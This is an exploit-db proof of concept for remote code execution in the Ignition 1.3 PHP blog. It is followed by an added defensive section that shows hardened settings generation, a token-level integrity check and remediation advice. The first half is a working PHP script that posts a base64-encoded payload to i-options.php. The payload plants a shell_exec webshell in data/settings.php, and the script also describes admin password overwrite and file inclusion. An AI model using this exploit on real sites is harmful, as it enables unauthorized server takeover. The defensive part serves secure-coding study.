Ignition 1.3 – Remote Code Execution

  • Author: cOndemned
    Date: 2010-12-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15865/
  • <?php
    
    /*
    
    Ignition 1.3 Remote Code Execution Exploit
    by cOndemned
    download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
    
    
    source of i-options.php (excerpt; line numbers are referenced below)
    
    	1.	<?php
    	2.	session_start();
    	3.	if ($_POST['submit']) {
    	4.	if ($FH = @fopen('data/settings.php', 'w')) {
    	5.		@fwrite($FH, '<?php $pass = "'.$_POST['pass'].'";
    	6.	$uri = "'.$_POST['uri'].'";
    	7.	$suri = "'.$_POST['suri'].'";
    	8.	$blogtitle = "'.$_POST['title'].'";
    	9.	$description = "'.$_POST['description'].'";
    	10.	$postid = "'.$_POST['id'].'";
    	11.	$author = "'.$_POST['author'].'";
    	12.	$skin = "'.$_POST['skin'].'";
    	13.	$gravatar = "'.$_POST['gravatar'].'";
    	14.	$twitter = "' . $_POST['twitter'] . '";
    	15.	$identica = "' . $_POST['identica'] . '";
    	16.	$book = "' . $_POST['book'] . '";
    	17.	$game = "' . $_POST['game'] . '";
    	18.	$language = "' . $_POST['lang'] . '";
    	19.	
    	20.	require_once("template.php");
    	21.	require_once("lang/$language.php");');
    	22.		#fclose($FH);
    	23.	}
    
    We can overwrite data/settings.php simply by sending a specially crafted POST request
    to i-options.php and putting code into one of the variables: every POST value is
    concatenated straight into PHP source, and in the excerpt above nothing checks the
    session before the write. After running my PoC, the line with the $language var
    will be:
    
    	$language = "en";echo @shell_exec($_GET['cmd']);$wtf="";
    
    Here "en" is the default language, and the trailing $wtf="" absorbs the '";' that
    the script appends after the value. Without filling this field in correctly the
    admin will see an error when opening the blog index, because the
    require_once("lang/$language.php") on line 21 fails.
    
    Other attack scenarios:
    
    	- the attacker can use $_POST['lang'] (written to $language) to exploit a
    	Local File Inclusion (lines 18 and 21)
    
    	- fill $_POST['pass'] with a new password (md5 hashed) to overwrite the
    	admin's password
    
    	- etc...
    */
    
    
    // Target base URL, trailing slash included: the same value is written into the
    // blog's uri/suri settings, and the request URLs below append to it.
    $target = 'http://localhost/ignition/';
    
    // Fields that i-options.php writes verbatim into data/settings.php.
    // The 'lang' value decodes to:  en";echo @shell_exec($_GET['cmd']);$wtf="
    // so the written line becomes:  $language = "en";echo @shell_exec($_GET['cmd']);$wtf="";
    $post = array
    (
    	'uri'		=> $target,
    	'suri'		=> $target,
    	'description'	=> 'Just another lame php blog script owned :<',
    	'skin'		=> 'default',
    	'lang'		=> base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='),
    	'submit'	=> 1
    );
    
    $sock = curl_init();
    
    curl_setopt_array
    (
    	$sock, 
    	array
    	(
    		CURLOPT_URL 		=> $target . 'i-options.php',
    		CURLOPT_RETURNTRANSFER	=> true,
    		CURLOPT_POST		=> true,
    		CURLOPT_POSTFIELDS	=> http_build_query($post)
    	)
    );
    
    if (curl_exec($sock) === false) {
    	die('Request failed: ' . curl_error($sock) . "\n");
    }
    curl_close($sock);
    
    // The rewritten settings file is served directly out of data/, so the injected
    // shell_exec() runs on the next request to it.
    echo "Check: {$target}data/settings.php?cmd=[system_command]\n";
    
    ?>
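The root cause above is that i-options.php builds PHP source by string concatenation, so any value containing `";` breaks out of its string literal. The following is an added example, not code from Ignition or from the original exploit: it puts a builder that mirrors the vulnerable concatenation next to a hardened builder that whitelists each field and emits the literals with var_export(), and adds a token-level check that a settings file contains only plain literal assignments. The function names, the allowed-language list, the md5-shaped password rule, and the sample POST arrays are this example's own assumptions; the hardened file returns an array, so the consumer would load it as `$settings = require 'data/settings.php';` instead of relying on the globals the original writes.

```php
<?php
// Added example (not Ignition's code and not the original PoC). Function names,
// the allowed-language list and the sample POST data below are assumptions.

// Vulnerable: mirrors the concatenation in i-options.php. POST values are spliced
// straight into PHP source, so a value containing `";` ends the string literal and
// whatever follows it is executed when the file is included or requested.
function build_settings_vulnerable(array $post): string
{
    return '<?php $pass = "' . ($post['pass'] ?? '') . '";' . "\n"
         . '$language = "' . ($post['lang'] ?? '') . '";' . "\n";
}

// Hardened: validate each field against what it is allowed to be, then let
// var_export() produce the PHP literals. var_export() escapes quotes and
// backslashes, so no value can leave its string, and an unknown language name
// never reaches the require_once("lang/$language.php") path.
function build_settings_safe(array $post): string
{
    $allowed_langs = ['en', 'pl', 'de']; // assumption: whichever lang/*.php files exist
    $lang = $post['lang'] ?? 'en';
    if (!in_array($lang, $allowed_langs, true)) {
        throw new InvalidArgumentException("unknown language: $lang");
    }
    $pass = $post['pass'] ?? '';
    if ($pass !== '' && !preg_match('/^[0-9a-f]{32}$/', $pass)) {
        throw new InvalidArgumentException('pass must be an md5 hex digest');
    }
    $settings = ['pass' => $pass, 'language' => $lang];
    return "<?php\nreturn " . var_export($settings, true) . ";\n";
}

// Integrity check for an existing data/settings.php: tokenize it and refuse
// anything beyond what assignments or a returned array of literals need.
// An injected `echo @shell_exec(...)` shows up as T_ECHO / T_STRING and fails.
function settings_file_is_clean(string $src): bool
{
    $ok = [T_OPEN_TAG, T_WHITESPACE, T_VARIABLE, T_CONSTANT_ENCAPSED_STRING,
           T_RETURN, T_ARRAY, T_DOUBLE_ARROW, T_LNUMBER];
    foreach (token_get_all($src) as $tok) {
        if (is_string($tok)) {            // single-character tokens
            if (!in_array($tok, ['=', ';', '(', ')', ',', '[', ']'], true)) {
                return false;
            }
        } elseif (!in_array($tok[0], $ok, true)) {
            return false;
        }
    }
    return true;
}

// Constructed sample input: the PoC's lang payload, and a benign request.
$evil   = ['lang' => 'en";echo @shell_exec($_GET[\'cmd\']);$wtf="'];
$benign = ['lang' => 'en', 'pass' => md5('s3cret')];

var_dump(settings_file_is_clean(build_settings_vulnerable($evil)));
var_dump(settings_file_is_clean(build_settings_vulnerable($benign)));
var_dump(settings_file_is_clean(build_settings_safe($benign)));
try {
    build_settings_safe($evil);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

Run it with `php` from the command line: the first check fails on the PoC payload because the generated file contains tokens other than literal assignments, the benign inputs pass through both builders, and the hardened builder refuses the payload outright since it is not a known language. Two further points the PoC makes clear but the builder alone does not fix: the write in i-options.php happens with no session check in the excerpt shown, so the page itself needs an authentication check before it touches data/settings.php, and data/ is served directly by the web server (the PoC's final "Check" URL depends on that), so the settings file should live outside the document root or be denied by the web server.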